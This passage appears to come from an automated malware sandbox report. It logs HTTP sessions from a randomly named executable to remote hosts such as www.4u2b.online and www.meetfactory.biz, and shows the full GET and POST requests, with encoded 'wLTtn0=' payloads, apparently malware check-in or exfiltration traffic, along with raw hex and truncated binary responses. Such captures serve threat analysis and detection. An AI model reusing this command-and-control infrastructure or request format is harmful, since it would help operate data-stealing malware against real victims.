wLTtn0=+d2e/RzmGnt3wmlHpphWidsrPtSXBhB8seanCD0cNMpF8cNQWZniYnT/zrLA+ouGA3lef39MEzUkB+CyE1WrMX5HodwNQxMwoUmhoO5gUg8LNkBZ0qFBLdQI6qUle4WR3Fe9hgP/Z1rGIC4+hMu5ecH6PUGDUx79VB6pC6SGrP+bVHrN8KXir+K6Irgng+FRty/SFFRs/dKGoVTlb2gmgBZ7BXq7UN3u0/eDP3yfAuF1oxFKRMa9UaUAnvR+8uQw2qMIC2SY9kMpdUnQfOSbKAYKzHD6wg50xeIoXbV0jB5fBpwSoKfUOjoc0flCqb63QvBnlVCp/tXBaBuCkzsgfaAR6eNkua9ExGnTjl924EfXQWnk6o5w4Jbuys2VyFLG+oXaaGoF5vGZ2HpSAQnVXt4aJM+KHuWLiYDMj6EXLSrAzRG5XjINzFMdTjbGYCUhDcMmLaXCUzp5kqWBe+eKx8c792biSk8tylsvtIRp9M9P35M8nppHuA0MTk890yO0tQW7LDPk7ARjaInxCoKNSxPQVLzEO5ag0VYr6wENVJNoRtOx0eOiBoo1RI05oqjA6PuPWSv/55htOWkqHLC0KnEF8jow0f6cfeV6SeaIyrf4MzP032dUOggq+oW/k/vtxjfWo9Za3uHZYY78DT9X+9cfl2JzJLeW+xmjFADrnnORlp5+yDoZS/kpSH9lCpeZjffxd79MFEtrrJKVxIMjQUlhQlL7z0HXGouZZ+QQfswvk7XEPxdjuhV3RXSAN0O3HSOx3H8s88byFe+e4T0dA5Jdjt2KsVW5Ea18YzkXx73qHLvw89q++xmmiBgKuDHMfjmAXxQYsAurwm/gUONOC0OabCgbv/LNQ6WYANxhNGQ3gkFvjNQsJpIn70LGqRoB5VQPTpAs4+fBm7Num1Yp8ClI4XZkJc/emV89nyE8r4CwPpGhoXjpnaqbmjq2W5kkP3v2hcfWEAoiVmLNu2I+ZXUGIl0os3+cPcRNuvA61/ilz [TRUNCATED]
Aug 6, 2024 07:57:29.613378048 CEST	816	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 06 Aug 2024 05:57:29 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 37 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 4d 73 9b 30 10 bd f7 57 50 0e 99 76 a6 e6 d3 8e 4d 03 e9 a4 ae ed 98 50 3b 4d 9d 60 b8 64 84 a4 18 25 42 22 20 c0 4e a7 ff bd 80 33 31 1d f7 52 1d 90 76 d9 dd b7 ef 2d c8 7e ff 6d 39 5e 05 d7 13 29 16 09 3d 7f 67 37 9b 44 01 db 38 32 66 f2 f9 3b a9 5e 76 8c 01 da 1f 5b 33 c1 02 48 30 06 59 8e 85 23 df ae a6 bd d1 6b e4 e1 75 2c 44 da c3 cf 05 29 1d 79 db 2b 40 0f f2 24 05 82 44 14 cb 12 e4 4c 60 56 e7 ce 27 0e 46 1b 7c 94 cd 40 82 1d b9 24 b8 4a 79 26 3a 09 15 41 22 76 10 2e 09 c4 bd d6 f8 24 11 46 04 01 b4 97 43 40 b1 a3 2b 5a b7 9c 20 82 e2 73 5b dd ef 2d 9d b6 49 c6 73 98 91 54 1c 68 fd bb f7 0c 3f 64 38 8f 3b 2d 68 67 45 46 9d 86 df 67 55 ad aa 6a a8 29 09 c6 e2 01 40 c1 b3 9d 12 91 17 55 96 d4 43 5d 5b 3d c6 b2 5b 09 bb 1a 1d e3 0c fe 03 c7 56 0f 23 b2 23 8e 76 12 67 94 03 e4 c8 88 df ef 8f 1f 3e 76 65 d9 93 97 c4 2e ad 75 16 78 2b d4 47 50 82 bd b7 13 d7 68 f2 50 30 28 08 67 52 a7 94 f4 eb 4d c9 26 a4 59 15 61 88 57 8a e0 a9 42 39 ac 27 cd 99 [TRUNCATED] Data Ascii: 270TMs0WPvMP;M`d%B" N31Rv-~m9^)=g7D82f;^v[3H0Y#ku,D)y+@$DL`V'F\|@$Jy&:A"v.$FC@+Z s[-IsTh?d8;-hgEFgUj)@UC][=[V##vg>ve.ux+GPhP0(gRM&YaWB9'$GbI/OQ90,-ECT7.bl;x0y"KrA<C3"6!kt>6LpRHM$$Zd/qSL,H[o780^hqG3=fi`L5[gE4kEfjWZ=>~=2XiHiOY2CgL(=/}c.pS<[p%kcge?V"1N0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49718	45.33.30.197	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:31.619751930 CEST	539	OUT	GET /m6nq/?K4G=Thy4J4VXH8ud&wLTtn0=zfe+8k3bS3VTyENDrpF5tYJUZKPBLxR5wPaRUhpCE/x49LgHC8jRfkvEkrDb2LyzQFIzQRxmXUwtO/OzOk2/N35cr/8qdVoH1F+0m51iVj8GFRVyh7gePfV4yv4xP9Sp9ECtryCPPQ+d HTTP/1.1 Host: www.meetfactory.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:57:32.128299952 CEST	1236	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 06 Aug 2024 05:57:32 GMT content-type: text/html transfer-encoding: chunked connection: close Data Raw: 34 43 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 6d 65 65 74 66 61 63 [TRUNCATED] Data Ascii: 4C8<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.meetfactory.biz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.meetfactory.biz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.meetfactory.biz/m6nq?gp=1&js=1&uuid=1722923852.0095214278&other_args=eyJ1cmkiOiAiL202bnEiLCAiYXJncyI6ICJLNEc9VGh5NEo0VlhIOHVkJndMVHRuMD16ZmUrOGszYlMzVlR5RU5EcnBGNXRZSlVaS1BCTHhSNXdQYVJVaHBDRS94NDlMZ0hDOGpSZmt2RWtyRGIyTHl6UUZJelFSeG1YVXd0Ty9Pek9rMi9OMzVjci84cWRWb0gxRiswbTUxaVZqOEdGUlZ5aDdnZVBmVjR5djR4UDlTcDlFQ3RyeUNQUFErZCIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY [TRUNCATED]
Aug 6, 2024 07:57:32.128405094 CEST	156	IN	Data Raw: 57 46 6e 5a 53 39 33 5a 57 4a 77 4c 47 6c 74 59 57 64 6c 4c 32 46 77 62 6d 63 73 4b 69 38 71 4f 33 45 39 4d 43 34 34 4c 47 46 77 63 47 78 70 59 32 46 30 61 57 39 75 4c 33 4e 70 5a 32 35 6c 5a 43 31 6c 65 47 4e 6f 59 57 35 6e 5a 54 74 32 50 57 49 Data Ascii: WFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0="; } </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49719	141.94.102.188	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:37.389358997 CEST	792	OUT	POST /mm8l/ HTTP/1.1 Host: www.4u2b.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.4u2b.online Referer: http://www.4u2b.online/mm8l/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 64 4c 76 76 48 46 56 71 72 45 71 2b 79 4f 36 2f 71 42 5a 38 57 53 6f 4d 4a 36 58 57 66 56 31 38 35 74 67 55 4a 6b 64 63 2f 78 43 6b 61 6d 41 36 4f 4f 7a 44 39 77 57 68 76 62 78 70 4e 4a 56 77 6e 34 36 6a 6c 67 4a 46 4b 6a 48 54 70 4f 33 6a 30 58 53 46 62 58 70 50 56 68 4f 47 42 4f 6d 51 7a 51 4c 37 62 73 73 31 33 42 2b 41 6e 4b 46 2f 2b 71 2f 4b 47 37 59 33 57 41 44 66 32 48 54 31 71 4d 74 4f 6f 38 55 74 32 69 6d 6a 34 4a 56 32 2f 73 72 64 57 47 74 55 59 37 4b 35 35 45 41 47 68 63 72 39 30 78 39 79 76 59 37 6f 39 75 54 49 46 33 34 30 30 4a 4b 4e 54 61 31 6b 74 4f 65 65 4d 5a 75 64 6c 2b 6f 31 77 57 41 51 54 74 68 5a 73 77 3d 3d Data Ascii: wLTtn0=dLvvHFVqrEq+yO6/qBZ8WSoMJ6XWfV185tgUJkdc/xCkamA6OOzD9wWhvbxpNJVwn46jlgJFKjHTpO3j0XSFbXpPVhOGBOmQzQL7bss13B+AnKF/+q/KG7Y3WADf2HT1qMtOo8Ut2imj4JV2/srdWGtUY7K55EAGhcr90x9yvY7o9uTIF3400JKNTa1ktOeeMZudl+o1wWAQTthZsw==
Aug 6, 2024 07:57:38.370721102 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://4u2b.online/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Tue, 06 Aug 2024 05:57:38 GMT Data Raw: 32 32 32 38 0d 0a 90 be 28 8a 72 d2 fa 43 46 22 8c f9 00 68 a4 2c 9c bf 7f 84 0e 9f f3 fe f3 97 56 df 71 55 7f fc cb 4a 05 4b 69 21 f0 dd 8b 9b f4 71 ce 99 e9 6b af 38 95 11 e8 81 95 08 89 95 84 8d 97 e6 7f 9d 46 d5 f8 bd 29 fa bf cc 06 fb 56 02 49 04 63 ec 61 73 9a bd 90 fc 04 fa 60 bd 01 49 2b 89 b1 7d 21 35 dd 55 57 14 ed fd ff be cd ec 17 87 58 b4 5b 94 6e dd 2a 3a a7 ca a7 77 67 6f 75 ef bb af f8 33 ff 17 33 1a 8a 41 50 80 40 79 03 08 0a 04 ba 2f fe 3f 71 87 01 d9 a3 4c b2 0d 6c 02 2d 8a 09 39 e0 10 42 ed d2 b5 a4 75 88 a1 75 53 8c 63 ea 5c 94 5b 7a 39 cc be 67 f7 af 22 22 82 d0 55 e8 63 38 df a9 80 31 4c 98 ff 63 cc ba df 43 42 54 72 30 d2 cb 46 09 50 d6 57 d0 11 1a 3d 7d d5 e3 e7 18 4c fc e3 1b be e1 64 63 03 61 99 fc b7 7a 08 39 1e fb 5d ba f5 33 a2 81 1c 0b 4b 02 93 43 a3 a8 17 e4 41 d7 30 34 d0 fb a0 d8 97 42 43 3e c7 f4 e5 d3 ca 3c 21 07 3a c7 ad b3 95 d2 d0 59 bb 4c dd b4 35 b7 ae 4e fa ca 24 73 7f 5f 48 50 41 c3 cd 5f a2 06 64 6c 40 53 63 fd 46 44 97 2f 16 f3 f9 0e ad 7e 2c de f2 db 3f [TRUNCATED] Data Ascii: 2228(rCF"h,VqUJKi!qk8F)VIcas`I+}!5UWX[n:wgou33AP@y/?qLl-9BuuSc\[z9g""Uc81LcCBTr0FPW=}Ldcaz9]3KCA04BC><!:YL5N$s_HPA_dl@ScFD/~,?zw9[g/K5c7)[JnH1aFYExD</m\8AY$!sB$/GWI {gL$l)7;u2YpjLQ\?K}[WOJ` \|O~'a7f;W\ZS@hm'6./:o\>$SV)Hy$`cSAd2=V!<`TCpgfw>XeE{+V;+kDC%@C,L3ex0$\oKf;@R20Gy"7%w2;"SP&,ogK#jx/@yKe.'tFj?ADB-y-<ww~L~X:qa0edU
Aug 6, 2024 07:57:38.370738983 CEST	1236	IN	Data Raw: 2d f7 5d 05 69 b5 ef 16 69 2a f7 dd 62 23 b6 5b cb c3 a0 2b 17 87 41 5f 4d e7 d9 14 75 a3 ac c4 f5 ba 4b ec 8c 88 38 d0 de 68 14 7d 7e a1 55 b5 da 77 b2 58 a5 fb 4e 96 9b ed f5 15 17 2b ae cb 00 3f c5 b6 b1 89 56 24 70 0f ba ad ab 5e ac 7a bd 7b Data Ascii: -]ii*b#[+A_MuK8h}~UwXN+?V$p^z{e[aKQ03lw\l)0U1/CutC.15${IBom!<)0%q_8:#t2M\|L()bD4?]M>'Wu`>gtD}x+<he
Aug 6, 2024 07:57:38.370753050 CEST	1236	IN	Data Raw: 2b a1 0e 68 c3 91 ba ed ad b7 36 26 35 23 15 7a 35 4a 41 d2 7b 67 9a d7 70 24 81 3a 9a f4 ac 93 20 c3 dc 3a cf bf ac 36 ca 58 48 67 5f 90 6b 4b 51 a3 af c6 68 9d 03 f2 58 4e a0 61 8e 8f ec 6c fd 9c 2f 04 8e 69 f0 6c 5f 05 76 3f 61 d0 11 89 a3 34 Data Ascii: +h6&5#z5JA{gp$: :6XHg_kKQhXNal/il_v?a4h\|\|tIDq%o9) ]C?Wqm&*\.B(!%XbV"T#m5ct_\0<Z=yhq),7KmB"N(k+WN
Aug 6, 2024 07:57:38.370774031 CEST	1236	IN	Data Raw: 2e 5a 99 a2 87 3d 9e 01 a4 20 5c 1c 26 b5 d3 53 32 c2 79 4d 44 15 82 32 cf 36 82 d2 1f 05 9a 69 a1 14 61 67 f0 33 78 41 a5 d7 a5 05 c1 b6 d0 17 6c da 2d 14 35 b8 f0 66 f4 29 97 82 14 3d 7f 66 51 2a 58 0b 2c 2b 4b 8f 8b b1 96 e2 69 ad f7 77 b7 64 Data Ascii: .Z= \&S2yMD26iag3xAl-5f)=fQX,+Kiwd-MXj5kAdbh^Pe:[[n`gN(Dvb5g]spf"aX?x(c%.}{y+=jf(kh)9vV0+n
Aug 6, 2024 07:57:38.370788097 CEST	1236	IN	Data Raw: ce 58 03 19 07 dd 25 71 03 f6 a0 14 75 46 5a 72 d7 31 be b9 88 bc 95 7b 15 60 20 d6 33 19 57 3e 0e fd 02 64 20 c5 5f ce 8e 2b d5 43 ee f5 30 2f e7 b0 5d 16 72 02 f9 b4 ed c5 1b 77 18 2f 5b 51 03 b4 21 85 13 46 2a 53 03 07 05 3a 65 33 43 43 a0 0f Data Ascii: X%quFZr1{` 3W>d _+C0/]rw/[Q!FS:e3CCmL6a`g;\HtmzkMWsYm/-mh#8"#5e="3E41^E~"G}/\%+.x:MGG
Aug 6, 2024 07:57:38.370800018 CEST	1236	IN	Data Raw: 95 18 74 bc b6 a8 7b 07 b4 21 f3 6e ee 77 68 75 b3 95 2a e4 82 f1 3a 67 22 9f ed 64 c7 42 36 11 a7 2e 59 86 0f 08 ad d0 84 50 d7 a9 70 b0 4a 9b e9 29 5d 73 13 10 02 a3 89 c7 f1 73 74 03 af c4 95 00 86 1d 29 af d8 ad a8 11 e5 d8 75 55 2a f9 f0 94 Data Ascii: t{!nwhu:g"dB6.YPpJ)]sst)uU9p^dKa:r=B"Dt8 F}d=_4i1A>?KY#6s2qa&2lY@G6<8rJxwXfq(Y2Q.}5C0?OO{X0a
Aug 6, 2024 07:57:38.370812893 CEST	776	IN	Data Raw: 54 5f 18 85 37 f8 93 59 90 21 f0 c6 d3 13 bc f3 0e ec 50 96 94 49 1d a6 d7 c5 e3 08 4f 8a 0d c3 0b 5b cc 38 33 c7 cd be dc 86 bf 6f 12 6a 32 66 20 b5 1e 3c d1 7e 1a 8e 9b bf ef b6 bb e3 c6 4e 80 26 7b 59 e6 aa d3 19 e5 74 1e 66 bb aa d7 f5 cf 72 Data Ascii: T_7Y!PIO[83oj2f <~N&{Ytfrcjrj8C@P`rdJratOidPx[axLQaEw}pVx!:*G@c5B>c9WW/DicD-h=$X}
Aug 6, 2024 07:57:38.371650934 CEST	923	IN	Data Raw: 53 ac 3c c8 ea 20 cb fe 30 b0 aa 62 83 f0 c4 5e 5a ab a7 a6 e0 cd 1e 19 63 b5 f9 93 d2 9f 84 ae a7 a6 e3 a8 39 4f 02 bd e0 6e 57 0f 5a aa d6 19 ae 81 2e a5 6f 3e a4 9f 7c f3 c1 17 5f 77 0b 3b d7 3e 9c 3b a9 a4 08 11 30 d4 e3 34 c5 ad 55 83 e4 d6 Data Ascii: S< 0b^Zc9OnWZ.o>\|_w;>;04UNSzzEQTHc9xNWxmW~vJFTfl9.h)*W#;51G10k&GCb\|5"R\|aBcR;+<)Ze5rTQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49720	141.94.102.188	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:39.933665991 CEST	812	OUT	POST /mm8l/ HTTP/1.1 Host: www.4u2b.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.4u2b.online Referer: http://www.4u2b.online/mm8l/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 64 4c 76 76 48 46 56 71 72 45 71 2b 79 75 71 2f 73 69 78 38 65 53 6f 50 46 61 58 57 47 46 31 77 35 74 73 55 4a 6c 6f 52 2b 44 32 6b 5a 43 45 36 63 36 76 44 74 67 57 68 33 4c 77 74 44 70 56 2f 6e 34 6e 63 6c 68 6c 46 4b 6a 6a 54 70 4f 48 6a 33 67 4f 47 62 48 70 4a 42 52 4f 41 63 65 6d 51 7a 51 4c 37 62 73 34 54 33 42 6d 41 67 36 31 2f 76 37 2f 4a 49 62 59 34 42 77 44 66 79 48 54 78 71 4d 73 74 6f 39 34 48 32 67 75 6a 34 4c 4e 32 2f 35 48 63 64 47 74 4e 57 62 4c 77 39 58 5a 75 73 2b 7a 68 33 43 6c 4c 76 49 72 58 31 34 4f 71 66 56 30 59 71 59 79 32 58 59 52 53 36 6f 44 72 4f 59 71 46 6f 63 63 55 76 68 6c 36 65 2f 41 64 36 4c 5a 38 52 6f 6f 58 62 45 50 49 69 4e 7a 68 6e 79 74 68 5a 4a 63 3d Data Ascii: wLTtn0=dLvvHFVqrEq+yuq/six8eSoPFaXWGF1w5tsUJloR+D2kZCE6c6vDtgWh3LwtDpV/n4nclhlFKjjTpOHj3gOGbHpJBROAcemQzQL7bs4T3BmAg61/v7/JIbY4BwDfyHTxqMsto94H2guj4LN2/5HcdGtNWbLw9XZus+zh3ClLvIrX14OqfV0YqYy2XYRS6oDrOYqFoccUvhl6e/Ad6LZ8RooXbEPIiNzhnythZJc=
Aug 6, 2024 07:57:41.067440987 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://4u2b.online/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Tue, 06 Aug 2024 05:57:40 GMT Data Raw: 32 32 32 38 0d 0a 90 be 28 8a 72 d2 fa 43 46 22 8c f9 00 68 a4 2c 9c bf 7f 84 0e 9f f3 fe f3 97 56 df 71 55 7f fc cb 4a 05 4b 69 21 f0 dd 8b 9b f4 71 ce 99 e9 6b af 38 95 11 e8 81 95 08 89 95 84 8d 97 e6 7f 9d 46 d5 f8 bd 29 fa bf cc 06 fb 56 02 49 04 63 ec 61 73 9a bd 90 fc 04 fa 60 bd 01 49 2b 89 b1 7d 21 35 dd 55 57 14 ed fd ff be cd ec 17 87 58 b4 5b 94 6e dd 2a 3a a7 ca a7 77 67 6f 75 ef bb af f8 33 ff 17 33 1a 8a 41 50 80 40 79 03 08 0a 04 ba 2f fe 3f 71 87 01 d9 a3 4c b2 0d 6c 02 2d 8a 09 39 e0 10 42 ed d2 b5 a4 75 88 a1 75 53 8c 63 ea 5c 94 5b 7a 39 cc be 67 f7 af 22 22 82 d0 55 e8 63 38 df a9 80 31 4c 98 ff 63 cc ba df 43 42 54 72 30 d2 cb 46 09 50 d6 57 d0 11 1a 3d 7d d5 e3 e7 18 4c fc e3 1b be e1 64 63 03 61 99 fc b7 7a 08 39 1e fb 5d ba f5 33 a2 81 1c 0b 4b 02 93 43 a3 a8 17 e4 41 d7 30 34 d0 fb a0 d8 97 42 43 3e c7 f4 e5 d3 ca 3c 21 07 3a c7 ad b3 95 d2 d0 59 bb 4c dd b4 35 b7 ae 4e fa ca 24 73 7f 5f 48 50 41 c3 cd 5f a2 06 64 6c 40 53 63 fd 46 44 97 2f 16 f3 f9 0e ad 7e 2c de f2 db 3f [TRUNCATED] Data Ascii: 2228(rCF"h,VqUJKi!qk8F)VIcas`I+}!5UWX[n:wgou33AP@y/?qLl-9BuuSc\[z9g""Uc81LcCBTr0FPW=}Ldcaz9]3KCA04BC><!:YL5N$s_HPA_dl@ScFD/~,?zw9[g/K5c7)[JnH1aFYExD</m\8AY$!sB$/GWI {gL$l)7;u2YpjLQ\?K}[WOJ` \|O~'a7f;W\ZS@hm'6./:o\>$SV)Hy$`cSAd2=V!<`TCpgfw>XeE{+V;+kDC%@C,L3ex0$\oKf;@R20Gy"7%w2;"SP&,ogK#jx/@yKe.'tFj?ADB-y-<ww~L~X:qa0edU
Aug 6, 2024 07:57:41.067579985 CEST	1236	IN	Data Raw: 2d f7 5d 05 69 b5 ef 16 69 2a f7 dd 62 23 b6 5b cb c3 a0 2b 17 87 41 5f 4d e7 d9 14 75 a3 ac c4 f5 ba 4b ec 8c 88 38 d0 de 68 14 7d 7e a1 55 b5 da 77 b2 58 a5 fb 4e 96 9b ed f5 15 17 2b ae cb 00 3f c5 b6 b1 89 56 24 70 0f ba ad ab 5e ac 7a bd 7b Data Ascii: -]ii*b#[+A_MuK8h}~UwXN+?V$p^z{e[aKQ03lw\l)0U1/CutC.15${IBom!<)0%q_8:#t2M\|L()bD4?]M>'Wu`>gtD}x+<he
Aug 6, 2024 07:57:41.067609072 CEST	1236	IN	Data Raw: 2b a1 0e 68 c3 91 ba ed ad b7 36 26 35 23 15 7a 35 4a 41 d2 7b 67 9a d7 70 24 81 3a 9a f4 ac 93 20 c3 dc 3a cf bf ac 36 ca 58 48 67 5f 90 6b 4b 51 a3 af c6 68 9d 03 f2 58 4e a0 61 8e 8f ec 6c fd 9c 2f 04 8e 69 f0 6c 5f 05 76 3f 61 d0 11 89 a3 34 Data Ascii: +h6&5#z5JA{gp$: :6XHg_kKQhXNal/il_v?a4h\|\|tIDq%o9) ]C?Wqm&*\.B(!%XbV"T#m5ct_\0<Z=yhq),7KmB"N(k+WN
Aug 6, 2024 07:57:41.067621946 CEST	672	IN	Data Raw: 2e 5a 99 a2 87 3d 9e 01 a4 20 5c 1c 26 b5 d3 53 32 c2 79 4d 44 15 82 32 cf 36 82 d2 1f 05 9a 69 a1 14 61 67 f0 33 78 41 a5 d7 a5 05 c1 b6 d0 17 6c da 2d 14 35 b8 f0 66 f4 29 97 82 14 3d 7f 66 51 2a 58 0b 2c 2b 4b 8f 8b b1 96 e2 69 ad f7 77 b7 64 Data Ascii: .Z= \&S2yMD26iag3xAl-5f)=fQX,+Kiwd-MXj5kAdbh^Pe:[[n`gN(Dvb5g]spf"aX?x(c%.}{y+=jf(kh)9vV0+n
Aug 6, 2024 07:57:41.067632914 CEST	1236	IN	Data Raw: 85 21 46 22 bd 61 73 a4 d6 d4 00 d1 34 24 9a 50 18 a7 16 c7 76 89 18 e3 9a 23 0e 93 6f 99 9b 2b e2 a3 c5 0c d5 14 4e 86 86 86 f8 50 1b da 2d ec 6e e9 a2 b9 21 6e 9c 04 ce 3a 1e be f6 64 e7 9f 9c a7 42 33 c5 f8 a8 6d 4f 88 0f 15 03 65 9a aa 34 2d Data Ascii: !F"as4$Pv#o+NP-n!n:dB3mOe4-9I4SA\|."@&fkLecyMWDM;88*O+T]7\?[@C%CW)Wqf'0hx{RYTlMJ_BIoVizx~i,[-/?j
Aug 6, 2024 07:57:41.067648888 CEST	1236	IN	Data Raw: 0a a1 00 05 0d 38 82 db 3d 1e 01 96 89 0a 76 1e 03 da 2e f0 e3 1d 74 38 ab 10 4b ee 7d dd bc a0 59 4d 51 81 63 6e ed b0 16 6b 08 41 1f 07 10 d6 de eb ea ab 1e f4 de ee c1 5a e8 51 d5 45 5d ec 69 c6 e3 cf 5c 12 5b 03 28 2e 70 f8 b4 e5 83 f1 81 70 Data Ascii: 8=v.t8K}YMQcnkAZQE]i\[(.pp.Z87X%L\rrCJ\(h7f`KO`LBQO"9-j,mV T @zXJ)C [cQQ,nr?xh/ev-
Aug 6, 2024 07:57:41.067662954 CEST	1236	IN	Data Raw: d5 05 a1 ca 48 0d af 12 3b c0 7d 6e 3a 5a bf d8 98 d4 8a 36 e9 ef d0 e0 15 42 5d 70 32 cc 63 6a f9 84 dd 1a a5 b6 c1 68 7d ab 88 09 cf d0 d7 20 f6 7c 10 89 3a aa e6 d0 38 ab d4 4a 8f 40 49 d6 8f a4 39 1e b2 48 14 04 43 2c c0 f3 64 4e ab 26 c4 c9 Data Ascii: H;}n:Z6B]p2cjh} \|:8J@I9HC,dN&~< oi(e/S7h8!Q{bX@Tb&;EH:zLFq K7_S;zS\d!/h"1 q3LdH+L~Y
Aug 6, 2024 07:57:41.067683935 CEST	104	IN	Data Raw: 9a 4b 05 d4 39 cf f6 aa 71 02 c3 9f f7 f8 4b ab 0d d8 d5 c3 b7 78 0d 33 c6 88 fe 94 5f aa 4e 55 91 33 76 ed 00 a3 3d a5 eb 9a 21 e2 49 d0 9f 5d 86 19 c3 1a 14 2a 3a 44 bf 10 b4 3d b6 30 a4 05 d1 5c d3 7f c8 bc 08 14 1f b5 79 ae 28 3f de 1a 9a 6c Data Ascii: K9qKx3_NU3v=!I]*:D=0\y(?l!ZH\|(
Aug 6, 2024 07:57:41.067869902 CEST	923	IN	Data Raw: 53 ac 3c c8 ea 20 cb fe 30 b0 aa 62 83 f0 c4 5e 5a ab a7 a6 e0 cd 1e 19 63 b5 f9 93 d2 9f 84 ae a7 a6 e3 a8 39 4f 02 bd e0 6e 57 0f 5a aa d6 19 ae 81 2e a5 6f 3e a4 9f 7c f3 c1 17 5f 77 0b 3b d7 3e 9c 3b a9 a4 08 11 30 d4 e3 34 c5 ad 55 83 e4 d6 Data Ascii: S< 0b^Zc9OnWZ.o>\|_w;>;04UNSzzEQTHc9xNWxmW~vJFTfl9.h)*W#;51G10k&GCb\|5"R\|aBcR;+<)Ze5rTQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49721	141.94.102.188	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
